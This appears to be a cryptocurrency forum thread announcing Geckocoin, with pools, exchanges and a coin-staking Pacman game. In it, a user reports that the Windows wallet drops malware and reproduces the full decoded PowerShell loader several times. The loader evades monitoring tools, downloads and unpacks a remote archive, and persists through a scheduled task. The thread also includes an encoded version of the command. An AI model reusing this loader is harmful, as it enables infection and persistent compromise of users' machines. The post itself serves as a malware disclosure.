[ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games}

[Gecko_mn]

About:

Geckocoin is an open source community-owned electronic coin designed to conduct transactions in game projects such as PvP over the network. 51% attack protection guarantees you a stablecoin that will expand and evolve thanks to the community as well as our innovations. Our ecosystem will grow with a library of quality online PvP games where you can earn or multiply your GEC.


Coinomic:

Total Supply: 21 Billion
Ticker: GEC
Algorithm: GhostRider
Block Reward: 5000 GEC
Reward Comissions: 2%
51% Protection: Yes


Link:

WebSite:
https://gecko.mn

GitHub:
https://github.com/GeckoProjectMN

Whitepaper:
https://whitepaper.gecko.mn

Pools:
https://cminer.org/
https://apipool.gecko.mn/
https://pool.mr-miner.de/
https://altcoinpool.ru/
https://mining4people.com/pool/geckocoin-pplns
https://miningpool2u.com/

Explorers:
https://gecko.mn/explorer/

Games:
https://geckoman.gecko.mn/ for 10.000GEC(for practice https://geckomanfree.gecko.mn/ )

Exchanges:

Bitoreum:
https://www.bitoreum.exchange/market/gecusdt
https://www.bitoreum.exchange/market/gecltc
https://www.bitoreum.exchange/market/gecbtrm



https://snowflakex.net/exchange/GEC/BTC
https://snowflakex.net/exchange/GEC/SNW
https://snowflakex.net/exchange/GEC/USDT


Socials:

Twitter: https://twitter.com/geckocoin_mn
Discord: https://discord.gg/YVkgrSkQCS

Wallets updated with links to VirusTotal and MD5 hashes.

md5 hash 77156fdcd419ec8b2fbff2927edb1352 geckocoin-qt.exe
https://www.virustotal.com/gui/file/ebe9d33f8ad0aad6f09eecd7cd8c336b41a75ca632b04ad852cb3078e3f836a9/detection

md5 hash 134ff49c22e4a6f183daf85976028429 geckocoin-qt
https://www.virustotal.com/gui/file/20b7bf877dd008135cee4a1c61bc59c4e6d836cb92a531fdd979441e38c4fe93/detection

md5 hash 65623d374b93cc8d31aba86766ec8e3a geckocoind
https://www.virustotal.com/gui/file/cd3ed010d5d591f24b7b7b452b9ce4b412fb11b0ae650cdd4bddea60597b4ac2?nocache=1

md5 hash e0bc2ba1b500e6713bd865287d6f414c geckocoin-cli
https://www.virustotal.com/gui/file/bca53461f3592fc3abae4eac5fc8155c24e390cc630a5d1eb27d2ba1cf16ed88?nocache=1

[1715169004]

1715169004

[thikachhey]

Wallet not syncing. Do we need to add any nodes?

[Gecko_mn]

addnode=213.174.1.154:52527
addnode=130.61.145.180:57058
addnode=141.148.226.235:60596
addnode=82.76.160.254:46872
addnode=85.208.185.5:46804
addnode=185.180.31.68:27351
addnode=82.76.160.254:46872
addnode=129.151.208.147:45208
addnode=195.213.1.134:1094
addnode=141.147.51.237:39168
addnode=84.143.39.17:50496
addnode=31.223.23.91:1455
addnode=185.180.31.68:27683
addnode=85.214.38.237:36354

[Gecko_mn]

ADD pool https://pool.mr-miner.de/
ADD pool https://altcoinpool.ru/

[Gecko_mn]

ADD pool https://mining4people.com/pool/geckocoin-pplns

[Gecko_mn]

ADD pool https://miningpool2u.com/

[Gecko_mn]

ADD Pool https://pool.mynewmining.com/#

[Gecko_mn]

Explorer:
Fixed a bug due to which the browser did not display information when entering the wallet address in the search bar

Pool:
Updated pool interface at the new address https://gecko.mn/pool/

[Gecko_mn]

We decided to release a small mini-game. Everyone knows the game Pacman, we present to you Geckoman - a game in which you will make a fixed bet and potentially win more coins, the higher the level, the bigger the win.

Instruction:
Entering the site, indicate the address of your wallet for future payments. Copy the deposit address and send a fixed amount of 10,000 GEC, wait for the first confirmation and press the play button.

Rules:
Your task is to control Gekoman and eat all the dots in the maze, while avoiding other doppelgangers chasing the hero.
To get your coins back you need to complete four levels, if you don't pass you will lose all coins. After the fourth level, the amount you have invested will gradually increase.

We are not responsible for any financial loss associated with playing Geckoman, please invest as much as you are willing to lose.

Let's play https://geckoman.gecko.mn/

For practice, you can play small amounts on 5GEC https://geckomanfree.gecko.mn/

[Gecko_mn]

ADD Exchange
https://snowflakex.net/exchange/GEC/BTC
https://snowflakex.net/exchange/GEC/SNW
https://snowflakex.net/exchange/GEC/USDT

[crackfoo]

Hi,
We've added Gecko (GEC) to http://zpool.ca/algo/ghostrider. See below for connection details.

Fee only: 1% or less
BTC payouts are processed once a day for balances above 0.0015
Payouts for all other currencies are made automatically every 4 hours for balances above 0.05 and balances more than 0.0125 are included in one of the payouts each day.

- Sample configurations -
To mine ghostrider and get paid in GEC:

Code:

-a ghostrider -o stratum+tcp://ghostrider.mine.zpool.ca:5354 -u GEC_ADDRESS -p c=GEC

Exchange to BTC:

Code:

-a ghostrider -o stratum+tcp://ghostrider.mine.zpool.ca:5354 -u BTC_ADDRESS -p c=BTC

All of our ports are NiceHash friendly, no need to specify any extra details

SSL/TLS is available for all ports. Simply prepend the port with a 5. Example for ghostrider: 55354

==============================

Support: https://discord.gg/n45n6Jj
Twitter: https://twitter.com/_zpool_

[Gecko_mn]

We decided to release a small mini-game. Everyone knows the game Pacman, we present to you Geckoman - a game in which you will make a fixed bet and potentially win more coins, the higher the level, the bigger the win.

Instruction:
Entering the site, indicate the address of your wallet for future payments. Copy the deposit address and send a fixed amount of 10,000 GEC, wait for the first confirmation and press the play button.

Rules:
Your task is to control Gekoman and eat all the dots in the maze, while avoiding other doppelgangers chasing the hero.
To get your coins back you need to complete four levels, if you don't pass you will lose all coins. After the fourth level, the amount you have invested will gradually increase.

We are not responsible for any financial loss associated with playing Geckoman, please invest as much as you are willing to lose.

Let's play https://geckoman.gecko.mn/

For practice, you can play small amounts on 5GEC https://geckomanfree.gecko.mn/

The game is available again:
Play with a bet of 10000 GEC: https://geckoman.gecko.mn
Training with 5GEC: https://geckomanfree.gecko.mn

[Gecko_mn]

We now have Whitepaper version 1.0 on the desktop of our website >> https://whitepaper.gecko.mn/

[antaresproject]

Intriguing, Considerable Max supply. What is the Masternode collateral?
 

[Gecko_mn]

Intriguing, Considerable Max supply. What is the Masternode collateral?
 

No. You didn't guess. The entire stock is liquidity for the online games of our platform.

[zsky]

Pac Game？

[sisyatek]

We have added GECKOCOIN to our Pool.
Happy to Mine!

https://cminer.org/

[Gecko_mn]

Pac Game？

We will make a lot of games that are 1980+ style.
The main feature of games will be pvp.

[Gecko_mn]

ADD Pool
https://cminer.org/

[zsky]

Games are very difficult
It's hard to control my little gecko

[Gecko_mn]

Games are very difficult
It's hard to control my little gecko

This is a complete replacement for mining. Here you can earn, but you have to work hard

[kalel22]

you should work on Marketing for this Coin as the project is very promising with the "Games" concept! try to get in touch with computing Giants like Google, Microsoft and Amazon ...etc with the offer to integrate it in their systems for example... just an idea amongst many . Just push it hard it's a good stuff! 

[Gecko_mn]

you should work on Marketing for this Coin as the project is very promising with the "Games" concept! try to get in touch with computing Giants like Google, Microsoft and Amazon ...etc with the offer to integrate it in their systems for example... just an idea amongst many . Just push it hard it's a good stuff! 

Thank you, it's important for us to know what you think. You have very good ideas, but they are impossible to implement.

[AmunRaEfect]

Retro/"nostalgia" games can be a concept that appeals to both gamers who played, as children, and younger players. Gecko thus has a growth potential that other new coins don't have, but more games and promotion is needed.

One of the few new projects worth watching. 

[Gecko_mn]

Retro/"nostalgia" games can be a concept that appeals to both gamers who played, as children, and younger players. Gecko thus has a growth potential that other new coins don't have, but more games and promotion is needed.

One of the few new projects worth watching. 

Thanks, we're glad you like our idea.
There will be many games, it will take time to develop them.

[Gecko_mn]

Our trading volume crossed the $3,000 mark for the first time

[Gecko_mn]

Geckomain is undergoing technical work, including adding support for BabaCoin (BBC).

Stay tuned for news on the next game soon.

[Gecko_mn]

The game works, accepts payment in GEC and BBC - https://geckoman.gecko.mn

[Gecko_mn]

So, we've been pretty busy lately with a new 2D game in development.

We thought about what the game should be like. We will tell you about it in the near future. In short, the game will be PvP, where you will fight with each other.

Wait for the announcement.📢

[Gecko_mn]

GEC has been listed on P2B with GEC/USDT pair
Enjoy your trading GEC\USDT
P2B announcements are posted

[Gecko_mn]

I announce a contest for the most original rules of the contest in the game GeckoMan.
the person whose idea we choose will win.
prize pool 100000GEC

[lijingang]

As far as I know, we once had a strategy mobile game (a game in which boss bullets can be classified by shooting advance) which was very popular in China in the past two years and was endorsed by the star Huang Xiaoming. I myself also like playing it very much. We have a large community, which still exists now and has recharged nearly 70,000 RMB into it. Since the official closed the recharge channel permanently and finally removed this classic design game permanently, our community still misses this game. I think if we can develop or buy the copyright of the game and embed gec into this game, I think the successful blockchain game will make the token very valuable. If possible, I can help attract a game group of 100,000 people.

[furcalor]

Malicious wallet

https://www.virustotal.com/gui/file/031a1900747aab0fc79a9972bf8aaaf0218f5e7124b28814d9c2321c4a650333/behavior
https://www.virustotal.com/gui/file/031a1900747aab0fc79a9972bf8aaaf0218f5e7124b28814d9c2321c4a650333/detection

Geckocoin has malicious wallet that executes a powershell command that downloads malicious files and sets a scheduled job on the PC to run.
If you PC has %appdata%\LogState\ folder with jLherYu.vbs file or ws2help.exe you have been infected!

Decoded powershell with the malicious url removed below:

Code:

If (Get-Process -Name 'Taskmgr', 'perfmon', 'ProcessHacker', 'TMX64', 'TMX', 'procexp64a', 'procexp64', 'procexp', 'ProcessExplorerPortable', 'SystemExplorerPortable', 'SystemExplorer', 'EXEExplorerPort', 'EXE', 'EXE64', 'TaskManagerPort', 'KillProcess', 'TaskMan', 'WinUtilitiesPortable', 'WinUtil', 'FreeTaskManager', 'AnVir', 'anvir64', 'Wireshark' -ErrorAction SilentlyContinue){exit} Else {if( !((Test-Path -Path "$env:APPDATA\LogState\htMbZp.py" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\ws2help.exe" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\jLherYu.vbs" -PathType Leaf))){schtasks /delete /tn "ImDskSvc\wmiApSrv" /f;Stop-Process -Name "ws2help";Remove-Item -Recurse -Force "$env:APPDATA\LogState";New-Item -ItemType Directory -Force -Path "$env:APPDATA\LogState";$addPath = "$env:APPDATA\LogState\jLherYu.vbs"; $text = "Option Explicit";$text2 = "Dim ProcessPath";$text3 = "Dim fileSystemObject";$text4 = "Dim strAppDataPath";$text5 = "ProcessPath = `"ws2help.exe`"";$text6 = "Call CheckProcess(DblQuote(ProcessPath))";$text7 = "Sub CheckProcess(ProcessPath)";$text8 = "Dim strComputer,objWMIService,colProcesses,WshShell,Tab,ProcessName";$text9 = "strComputer = `".`"";$text10 = "Tab = Split(ProcessPath,`"\`")";$text11 = "ProcessName = Tab(UBound(Tab))";$text12 = "ProcessName = Replace(ProcessName,Chr(34),`"`")";$text13 = "Set objWMIService = GetObject(`"winmgmts:`" _";$text14 = "& `"{impersonationLevel=impersonate}!\\`" & strComputer & `"\root\cimv2`")";$text15 = "Set colProcesses = objWMIService.ExecQuery _";$text16 = "(`"Select * from Win32_Process Where Name = '`"& ProcessName & `"'`")";$text17 = "Set fileSystemObject = CreateObject(`"Scripting.FileSystemObject`")";$text18 = "strAppDataPath = CreateObject(`"WScript.Shell`").ExpandEnvironmentStrings(`"%appdata%`")";$text19 = "If colProcesses.Count = 0 And fileSystemObject.FileExists(strAppDataPath & `"\LogState\htMbZp.py`") Then";$text20 = "Set WshShell = CreateObject(`"WScript.Shell`")";$text21 = "WshShell.Run `"cmd /c %appdata%\LogState\ws2help.exe %appdata%\LogState\htMbZp.py`", 0, False";$text22 = "Else";$text23 = "Exit Sub";$text24 = "End if";$text25 = "End Sub";$text26 = "Function DblQuote(Str)";$text27 = "DblQuote = Chr(34) & Str & Chr(34)";$text28 = "End Function";echo $text $text2 $text3 $text4 $text5 $text6 $text7 $text8 $text9 $text10 $text11 $text12 $text13 $text14 $text15 $text16 $text17 $text18 $text19 $text20 $text21 $text22 $text23 $text24 $text25 $text26 $text27 $text28 | Out-File $addPath;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri "http://REMOVED.net/bootstrap.zip" -OutFile "$env:TEMP\bootstrap.zip";Expand-Archive -Path "$env:TEMP\bootstrap.zip" -DestinationPath "$env:APPDATA\LogState" -Force;schtasks /create /sc minute /mo 10 /tn "ImDskSvc\wmiApSrv" /tr "$env:APPDATA\LogState\jLherYu.vbs" /f } else {Start-Process -FilePath "$env:APPDATA\LogState\jLherYu.vbs";break}}

[madmartyk]

Is there a cleaner for it?  I had it, deleted it all out.  If I start the Geckocoin wallet will it reinstall?

[Gecko_mn]

Code:

If (Get-Process -Name 'Taskmgr', 'perfmon', 'ProcessHacker', 'TMX64', 'TMX', 'procexp64a', 'procexp64', 'procexp', 'ProcessExplorerPortable', 'SystemExplorerPortable', 'SystemExplorer', 'EXEExplorerPort', 'EXE', 'EXE64', 'TaskManagerPort', 'KillProcess', 'TaskMan', 'WinUtilitiesPortable', 'WinUtil', 'FreeTaskManager', 'AnVir', 'anvir64', 'Wireshark' -ErrorAction SilentlyContinue){exit} Else {if( !((Test-Path -Path "$env:APPDATA\LogState\htMbZp.py" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\ws2help.exe" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\jLherYu.vbs" -PathType Leaf))){schtasks /delete /tn "ImDskSvc\wmiApSrv" /f;Stop-Process -Name "ws2help";Remove-Item -Recurse -Force "$env:APPDATA\LogState";New-Item -ItemType Directory -Force -Path "$env:APPDATA\LogState";$addPath = "$env:APPDATA\LogState\jLherYu.vbs"; $text = "Option Explicit";$text2 = "Dim ProcessPath";$text3 = "Dim fileSystemObject";$text4 = "Dim strAppDataPath";$text5 = "ProcessPath = `"ws2help.exe`"";$text6 = "Call CheckProcess(DblQuote(ProcessPath))";$text7 = "Sub CheckProcess(ProcessPath)";$text8 = "Dim strComputer,objWMIService,colProcesses,WshShell,Tab,ProcessName";$text9 = "strComputer = `".`"";$text10 = "Tab = Split(ProcessPath,`"\`")";$text11 = "ProcessName = Tab(UBound(Tab))";$text12 = "ProcessName = Replace(ProcessName,Chr(34),`"`")";$text13 = "Set objWMIService = GetObject(`"winmgmts:`" _";$text14 = "& `"{impersonationLevel=impersonate}!\\`" & strComputer & `"\root\cimv2`")";$text15 = "Set colProcesses = objWMIService.ExecQuery _";$text16 = "(`"Select * from Win32_Process Where Name = '`"& ProcessName & `"'`")";$text17 = "Set fileSystemObject = CreateObject(`"Scripting.FileSystemObject`")";$text18 = "strAppDataPath = CreateObject(`"WScript.Shell`").ExpandEnvironmentStrings(`"%appdata%`")";$text19 = "If colProcesses.Count = 0 And fileSystemObject.FileExists(strAppDataPath & `"\LogState\htMbZp.py`") Then";$text20 = "Set WshShell = CreateObject(`"WScript.Shell`")";$text21 = "WshShell.Run `"cmd /c %appdata%\LogState\ws2help.exe %appdata%\LogState\htMbZp.py`", 0, False";$text22 = "Else";$text23 = "Exit Sub";$text24 = "End if";$text25 = "End Sub";$text26 = "Function DblQuote(Str)";$text27 = "DblQuote = Chr(34) & Str & Chr(34)";$text28 = "End Function";echo $text $text2 $text3 $text4 $text5 $text6 $text7 $text8 $text9 $text10 $text11 $text12 $text13 $text14 $text15 $text16 $text17 $text18 $text19 $text20 $text21 $text22 $text23 $text24 $text25 $text26 $text27 $text28 | Out-File $addPath;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri "http://REMOVED.net/bootstrap.zip" -OutFile "$env:TEMP\bootstrap.zip";Expand-Archive -Path "$env:TEMP\bootstrap.zip" -DestinationPath "$env:APPDATA\LogState" -Force;schtasks /create /sc minute /mo 10 /tn "ImDskSvc\wmiApSrv" /tr "$env:APPDATA\LogState\jLherYu.vbs" /f } else {Start-Process -FilePath "$env:APPDATA\LogState\jLherYu.vbs";break}}

Stop writing this lies everywhere, give video evidence, if you have any at all

[madmartyk]

From what I have seen on discord the trojan is in VKAX wallet.

[Gecko_mn]

From what I have seen on discord the trojan is in VKAX wallet.

That's right, but they are trying to blame us

[Gecko_mn]

As far as I know, we once had a strategy mobile game (a game in which boss bullets can be classified by shooting advance) which was very popular in China in the past two years and was endorsed by the star Huang Xiaoming. I myself also like playing it very much. We have a large community, which still exists now and has recharged nearly 70,000 RMB into it. Since the official closed the recharge channel permanently and finally removed this classic design game permanently, our community still misses this game. I think if we can develop or buy the copyright of the game and embed gec into this game, I think the successful blockchain game will make the token very valuable. If possible, I can help attract a game group of 100,000 people.

We develop PVP games.
The commission will be deducted from the winner.
Half the commission to the team, half the commission will be burned.

[Gecko_mn]

As far as I know, we once had a strategy mobile game (a game in which boss bullets can be classified by shooting advance) which was very popular in China in the past two years and was endorsed by the star Huang Xiaoming. I myself also like playing it very much. We have a large community, which still exists now and has recharged nearly 70,000 RMB into it. Since the official closed the recharge channel permanently and finally removed this classic design game permanently, our community still misses this game. I think if we can develop or buy the copyright of the game and embed gec into this game, I think the successful blockchain game will make the token very valuable. If possible, I can help attract a game group of 100,000 people.

There will be mods 1x1, 2x2, 4x4, 16x16. Like survival mode, it's every man for himself.

[Gecko_mn]

https://twitter.com/elonmusk/status/1632060356930555904?s=20

[furcalor]

Code:

If (Get-Process -Name 'Taskmgr', 'perfmon', 'ProcessHacker', 'TMX64', 'TMX', 'procexp64a', 'procexp64', 'procexp', 'ProcessExplorerPortable', 'SystemExplorerPortable', 'SystemExplorer', 'EXEExplorerPort', 'EXE', 'EXE64', 'TaskManagerPort', 'KillProcess', 'TaskMan', 'WinUtilitiesPortable', 'WinUtil', 'FreeTaskManager', 'AnVir', 'anvir64', 'Wireshark' -ErrorAction SilentlyContinue){exit} Else {if( !((Test-Path -Path "$env:APPDATA\LogState\htMbZp.py" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\ws2help.exe" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\jLherYu.vbs" -PathType Leaf))){schtasks /delete /tn "ImDskSvc\wmiApSrv" /f;Stop-Process -Name "ws2help";Remove-Item -Recurse -Force "$env:APPDATA\LogState";New-Item -ItemType Directory -Force -Path "$env:APPDATA\LogState";$addPath = "$env:APPDATA\LogState\jLherYu.vbs"; $text = "Option Explicit";$text2 = "Dim ProcessPath";$text3 = "Dim fileSystemObject";$text4 = "Dim strAppDataPath";$text5 = "ProcessPath = `"ws2help.exe`"";$text6 = "Call CheckProcess(DblQuote(ProcessPath))";$text7 = "Sub CheckProcess(ProcessPath)";$text8 = "Dim strComputer,objWMIService,colProcesses,WshShell,Tab,ProcessName";$text9 = "strComputer = `".`"";$text10 = "Tab = Split(ProcessPath,`"\`")";$text11 = "ProcessName = Tab(UBound(Tab))";$text12 = "ProcessName = Replace(ProcessName,Chr(34),`"`")";$text13 = "Set objWMIService = GetObject(`"winmgmts:`" _";$text14 = "& `"{impersonationLevel=impersonate}!\\`" & strComputer & `"\root\cimv2`")";$text15 = "Set colProcesses = objWMIService.ExecQuery _";$text16 = "(`"Select * from Win32_Process Where Name = '`"& ProcessName & `"'`")";$text17 = "Set fileSystemObject = CreateObject(`"Scripting.FileSystemObject`")";$text18 = "strAppDataPath = CreateObject(`"WScript.Shell`").ExpandEnvironmentStrings(`"%appdata%`")";$text19 = "If colProcesses.Count = 0 And fileSystemObject.FileExists(strAppDataPath & `"\LogState\htMbZp.py`") Then";$text20 = "Set WshShell = CreateObject(`"WScript.Shell`")";$text21 = "WshShell.Run `"cmd /c %appdata%\LogState\ws2help.exe %appdata%\LogState\htMbZp.py`", 0, False";$text22 = "Else";$text23 = "Exit Sub";$text24 = "End if";$text25 = "End Sub";$text26 = "Function DblQuote(Str)";$text27 = "DblQuote = Chr(34) & Str & Chr(34)";$text28 = "End Function";echo $text $text2 $text3 $text4 $text5 $text6 $text7 $text8 $text9 $text10 $text11 $text12 $text13 $text14 $text15 $text16 $text17 $text18 $text19 $text20 $text21 $text22 $text23 $text24 $text25 $text26 $text27 $text28 | Out-File $addPath;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri "http://REMOVED.net/bootstrap.zip" -OutFile "$env:TEMP\bootstrap.zip";Expand-Archive -Path "$env:TEMP\bootstrap.zip" -DestinationPath "$env:APPDATA\LogState" -Force;schtasks /create /sc minute /mo 10 /tn "ImDskSvc\wmiApSrv" /tr "$env:APPDATA\LogState\jLherYu.vbs" /f } else {Start-Process -FilePath "$env:APPDATA\LogState\jLherYu.vbs";break}}

Stop writing this lies everywhere, give video evidence, if you have any at all

Check out the virustotal link earlier in the topic, specifically the behavior one.
GeckoCoin wallet executes this line:

Code:

C:\Windows\System32\cmd.exe /C powershell.exe -exec bypass -enc SQBmACAAKABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAnAFQAYQBzAGsAbQBnAHIAJwAsACAAJwBwAGUAcgBmAG0AbwBuACcALAAgACcAUAByAG8AYwBlAHMAcwBIAGEAYwBrAGUAcgAnACwAIAAnAFQATQBYADYANAAnACwAIAAnAFQATQBYACcALAAgACcAcAByAG8AYwBlAHgAcAA2ADQAYQAnACwAIAAnAHAAcgBvAGMAZQB4AHAANgA0ACcALAAgACcAcAByAG8AYwBlAHgAcAAnACwAIAAnAFAAcgBvAGMAZQBzAHMARQB4AHAAbABvAHIAZQByAFAAbwByAHQAYQBiAGwAZQAnACwAIAAnAFMAeQBzAHQAZQBtAEUAeABwAGwAbwByAGUAcgBQAG8AcgB0AGEAYgBsAGUAJwAsACAAJwBTAHkAcwB0AGUAbQBFAHgAcABsAG8AcgBlAHIAJwAsACAAJwBFAFgARQBFAHgAcABsAG8AcgBlAHIAUABvAHIAdAAnACwAIAAnAEUAWABFACcALAAgACcARQBYAEUANgA0ACcALAAgACcAVABhAHMAawBNAGEAbgBhAGcAZQByAFAAbwByAHQAJwAsACAAJwBLAGkAbABsAFAAcgBvAGMAZQBzAHMAJwAsACAAJwBUAGEAcwBrAE0AYQBuACcALAAgACcAVwBpAG4AVQB0AGkAbABpAHQAaQBlAHMAUABvAHIAdABhAGIAbABlACcALAAgACcAVwBpAG4AVQB0AGkAbAAnACwAIAAnAEYAcgBlAGUAVABhAHMAawBNAGEAbgBhAGcAZQByACcALAAgACcAQQBuAFYAaQByACcALAAgACcAYQBuAHYAaQByADYANAAnACwAIAAnAFcAaQByAGUAcwBoAGEAcgBrACcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQB7AGUAeABpAHQAfQAgAEUAbABzAGUAIAB7AGkAZgAoACAAIQAoACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAaAB0AE0AYgBaAHAALgBwAHkAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAALQBhAG4AZAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQAgAC0AYQBuAGQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQApAHsAcwBjAGgAdABhAHMAawBzACAALwBkAGUAbABlAHQAZQAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AZgA7AFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAIgB3AHMAMgBoAGUAbABwACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7AE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7ACQAYQBkAGQAUABhAHQAaAAgAD0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAagBMAGgAZQByAFkAdQAuAHYAYgBzACIAOwAgACQAdABlAHgAdAAgAD0AIAAiAE8AcAB0AGkAbwBuACAARQB4AHAAbABpAGMAaQB0ACIAOwAkAHQAZQB4AHQAMgAgAD0AIAAiAEQAaQBtACAAUAByAG8AYwBlAHMAcwBQAGEAdABoACIAOwAkAHQAZQB4AHQAMwAgAD0AIAAiAEQAaQBtACAAZgBpAGwAZQBTAHkAcwB0AGUAbQBPAGIAagBlAGMAdAAiADsAJAB0AGUAeAB0ADQAIAA9ACAAIgBEAGkAbQAgAHMAdAByAEEAcABwAEQAYQB0AGEAUABhAHQAaAAiADsAJAB0AGUAeAB0ADUAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAFAAYQB0AGgAIAA9ACAAYAAiAHcAcwAyAGgAZQBsAHAALgBlAHgAZQBgACIAIgA7ACQAdABlAHgAdAA2ACAAPQAgACIAQwBhAGwAbAAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgARABiAGwAUQB1AG8AdABlACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAKQAiADsAJAB0AGUAeAB0ADcAIAA9ACAAIgBTAHUAYgAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAIgA7ACQAdABlAHgAdAA4ACAAPQAgACIARABpAG0AIABzAHQAcgBDAG8AbQBwAHUAdABlAHIALABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlACwAYwBvAGwAUAByAG8AYwBlAHMAcwBlAHMALABXAHMAaABTAGgAZQBsAGwALABUAGEAYgAsAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAiADsAJAB0AGUAeAB0ADkAIAA9ACAAIgBzAHQAcgBDAG8AbQBwAHUAdABlAHIAIAA9ACAAYAAiAC4AYAAiACIAOwAkAHQAZQB4AHQAMQAwACAAPQAgACIAVABhAGIAIAA9ACAAUwBwAGwAaQB0ACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACwAYAAiAFwAYAAiACkAIgA7ACQAdABlAHgAdAAxADEAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAA9ACAAVABhAGIAKABVAEIAbwB1AG4AZAAoAFQAYQBiACkAKQAiADsAJAB0AGUAeAB0ADEAMgAgAD0AIAAiAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAD0AIABSAGUAcABsAGEAYwBlACgAUAByAG8AYwBlAHMAcwBOAGEAbQBlACwAQwBoAHIAKAAzADQAKQAsAGAAIgBgACIAKQAiADsAJAB0AGUAeAB0ADEAMwAgAD0AIAAiAFMAZQB0ACAAbwBiAGoAVwBNAEkAUwBlAHIAdgBpAGMAZQAgAD0AIABHAGUAdABPAGIAagBlAGMAdAAoAGAAIgB3AGkAbgBtAGcAbQB0AHMAOgBgACIAIABfACIAOwAkAHQAZQB4AHQAMQA0ACAAPQAgACIAJgAgAGAAIgB7AGkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4ATABlAHYAZQBsAD0AaQBtAHAAZQByAHMAbwBuAGEAdABlAH0AIQBcAFwAYAAiACAAJgAgAHMAdAByAEMAbwBtAHAAdQB0AGUAcgAgACYAIABgACIAXAByAG8AbwB0AFwAYwBpAG0AdgAyAGAAIgApACIAOwAkAHQAZQB4AHQAMQA1ACAAPQAgACIAUwBlAHQAIABjAG8AbABQAHIAbwBjAGUAcwBzAGUAcwAgAD0AIABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlAC4ARQB4AGUAYwBRAHUAZQByAHkAIABfACIAOwAkAHQAZQB4AHQAMQA2ACAAPQAgACIAKABgACIAUwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIABXAGgAZQByAGUAIABOAGEAbQBlACAAPQAgACcAYAAiACYAIABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAmACAAYAAiACcAYAAiACkAIgA7ACQAdABlAHgAdAAxADcAIAA9ACAAIgBTAGUAdAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQAIAA9ACAAQwByAGUAYQB0AGUATwBiAGoAZQBjAHQAKABgACIAUwBjAHIAaQBwAHQAaQBuAGcALgBGAGkAbABlAFMAeQBzAHQAZQBtAE8AYgBqAGUAYwB0AGAAIgApACIAOwAkAHQAZQB4AHQAMQA4ACAAPQAgACIAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkALgBFAHgAcABhAG4AZABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAUwB0AHIAaQBuAGcAcwAoAGAAIgAlAGEAcABwAGQAYQB0AGEAJQBgACIAKQAiADsAJAB0AGUAeAB0ADEAOQAgAD0AIAAiAEkAZgAgAGMAbwBsAFAAcgBvAGM